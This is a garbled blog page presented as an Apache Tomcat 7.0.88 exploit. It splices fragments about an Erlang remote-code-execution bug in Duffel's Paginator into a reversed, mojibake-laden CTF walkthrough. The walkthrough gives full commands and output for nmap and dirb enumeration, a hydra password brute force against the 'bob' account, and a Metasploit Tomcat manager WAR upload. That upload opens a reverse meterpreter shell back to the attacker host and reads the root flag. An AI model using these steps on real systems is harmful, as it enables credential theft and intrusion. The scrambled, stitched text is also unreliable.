Apache tomcat 7.0.88 exploit2/16/2024 This code execution vulnerability existed due to the use of Erlang’s binary_to_term in combination with untrusted user data. That an attacker exploiting this vulnerability would have been able to execute code on Duffel’s (cloud) assets. Since Duffel seemed to use Paginator for its own REST API it seems likely The vulnerability has the CVE number CVE-2020-15150 assigned. ![]() rw- 1 root root 658 cat /root/flag.txtĬat here you are a root guru and you got the flag happy with that, but make sure to focus more on the most important part, is to understand why does it work, why exactly when you ran exploit or run in that msfconsole it gave you back a reverse shell, if you are interested on reading more about this exploit, I will leave the ruby file of the exploit used in metasploit and more details on the exploit itself.In August of this year I found a remote code execution vulnerability in the Elixir-based Paginator open-source project from Duffel (a UK-based startup in the flight searching space). meterpreter > getuidĭrwxr-xr-x 23 root root 4096 Apr 3 13:34. Meterpreter session 1 opened (10.10.152.253:4444 -> 10.10.27.83:47080) at 14:12:10 +0000Īnd we have a shell, so technically what happened the script logged in went to /manager and uploaded a war file and gave us an easy lazy reverse shell and not any shell a root user shell. Undeploying kDC5cLvVGr0Ljgc6SbP4zI0e0sf. Uploading and deploying kDC5cLvVGr0Ljgc6SbP4zI0e0sf. Msf5 exploit(multi/http/tomcat_mgr_upload) > run LHOST 10.10.152.253 yes The listen address (an interface may be specified) Payload options (java/meterpreter/reverse_tcp): TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) SSL false no Negotiate SSL/TLS for outgoing connections RHOSTS 10.10.27.83 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' Proxies no A proxy chain of format type:host:port HttpUsername bob no The username to authenticate as HttpPassword xxxxxxx no The password for the specified username Name Current Setting Required Description Module options (exploit/multi/http/tomcat_mgr_upload): ![]() msf5 exploit(multi/http/tomcat_mgr_upload) > show options The version we are on it accepts some code execution and already exist in metasploit which means less work for us, It's all right to be lazy sometimes. Hydra () finished at we know the user and we brute forced the password with hydra let's dig more and see what we can do with our results so far host: 10.10.27.83 login: bob password: xxxxxxxġ of 1 target successfully completed, 1 valid password found Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txtĭOWNLOADED: 9224 - FOUND: we have a message in directory /guidelines for Mr bob that forgot maybe to update the Tomcat server and another one /protected that tells us that we are visiting the wrong port, that's fine because we have more in port 1234 hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.27.83 http-get /protected Nmap done: 1 IP address (1 host up) scanned in 8.18 have 22 SSH, 80 HTTP, and another HTTP on 1234 running Tomcat and 8009 for ajp13 let's have a look what we are dealing with on 80 and check if there's any open directories so we can understand more what we are trying to break dirb Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_ajp-methods: Failed to get a valid response for the OPTION request |_http-title: Site doesn't have a title (text/html).ġ234/tcp open http Apache Tomcat/Coyote JSP engine 1.1Ĩ009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_http-server-header: Apache/2.4.18 (Ubuntu) Nmap scan report for (10.10.27.83)Ģ2/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux protocol 2.0) Let's enumerate the machine nmap -sC -sV 10.10.27.83 Hello all, today's challenge is made by, it's a fun CTF ratted as easy, totally straight forward.
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |